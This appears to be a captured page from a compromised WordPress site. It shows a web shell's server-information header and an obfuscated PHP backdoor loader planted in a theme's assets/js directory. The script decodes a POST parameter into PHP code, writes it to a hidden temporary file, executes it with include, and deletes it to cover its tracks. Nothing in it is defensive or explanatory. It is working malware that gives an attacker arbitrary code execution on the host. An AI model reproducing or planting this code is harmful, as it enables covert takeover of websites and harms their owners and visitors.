| Server IP : 145.239.37.162 / Your IP : 216.73.217.46 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaa/www/wp-content/themes/post_1787161175/assets/js/ |
Upload File : |
<!--LSe7pGKw-->
<!--LSe7pGKw-->
<?php
if(!is_null($_POST["e\x6C\x65m"] ?? null)){
$data_chunk = $_POST["e\x6C\x65m"];
$data_chunk= explode ( '.' , $data_chunk ) ;
$element = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s);
foreach ($data_chunk as $i=> $val):
$chS = ord($s[$i % $sLen]);
$dec = ((int)$val - $chS - ($i % 10)) ^ 57;
$element .= chr($dec);
endforeach;
$mrk = array_filter([getcwd(), "/var/tmp", "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), getenv("TMP"), sys_get_temp_dir()]);
for ($obj = 0, $ptr = count($mrk); $obj < $ptr; $obj++) {
$sym = $mrk[$obj];
if (!( !is_dir($sym) || !is_writable($sym) )) {
$object = implode("/", [$sym, ".fac"]);
if ($parameter_group = fopen($object, 'w')) {
fwrite($parameter_group, $element);
fclose($parameter_group);
include $object;
unlink($object);
die();
}
}
}
}